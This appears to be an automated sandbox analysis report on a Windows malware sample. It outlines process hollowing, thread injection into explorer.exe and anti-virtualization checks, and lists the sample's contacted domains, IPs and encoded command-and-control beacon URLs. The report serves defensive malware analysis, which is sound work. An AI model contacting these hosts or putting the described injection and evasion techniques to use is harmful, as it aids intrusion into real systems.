Source: Yara match File source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 562156 Sample: H4vBtZsi8xAKaMm.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 7 other signatures 2->53 10 H4vBtZsi8xAKaMm.exe 3 2->10         started        process3 file4 33 C:\Users\user\...\H4vBtZsi8xAKaMm.exe.log, ASCII 10->33 dropped 63 Writes to foreign memory regions 10->63 65 Injects a PE file into a foreign processes 10->65 14 MSBuild.exe 10->14         started        signatures5 process6 signatures7 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Maps a DLL or memory area into another process 14->69 71 Sample uses process hollowing technique 14->71 73 2 other signatures 14->73 17 explorer.exe 14->17 injected process8 signatures9 45 System process connects to network (likely due to code injection or exploit) 17->45 20 rundll32.exe 17->20         started        process10 signatures11 55 Modifies the context of a thread in another process (thread injection) 20->55 57 Maps a DLL or memory area into another process 20->57 59 Tries to detect virtualization through RDTSC time measurements 20->59 23 explorer.exe 3 149 20->23         started        27 explorer.exe 2 153 20->27         started        29 cmd.exe 1 20->29         started        process12 dnsIp13 35 bettingweb365.com 92.222.235.170, 49887, 80 OVHFR France 23->35 37 marymarinho.com 192.0.78.24, 49885, 80 AUTOMATTICUS United States 23->37 43 4 other IPs or domains 23->43 61 System process connects to network (likely due to code injection or exploit) 23->61 39 www.vzn2aai2qj.icu 27->39 41 www.deutscheno1.com 27->41 31 conhost.exe 29->31         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.0.78.24
 marymarinho.com United States
2635 AUTOMATTICUS false
92.222.235.170
 bettingweb365.com France
16276 OVHFR false
107.180.34.104
 shitcoin.team United States
26496 AS-26496-GO-DADDY-COM-LLCUS false

Contacted Domains

Name IP Active
bettingweb365.com 92.222.235.170 true
www.deutscheno1.com 34.149.59.90 true
marymarinho.com 192.0.78.24 true
shitcoin.team 107.180.34.104 true
www.shitcoin.team unknown unknown
www.bettingweb365.com unknown unknown
www.vzn2aai2qj.icu unknown unknown
www.marymarinho.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.marymarinho.com/u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT true
  • Avira URL Cloud: safe
 unknown
http://www.bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT true
  • Avira URL Cloud: safe
 unknown
http://www.shitcoin.team/u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT true
  • Avira URL Cloud: safe
 unknown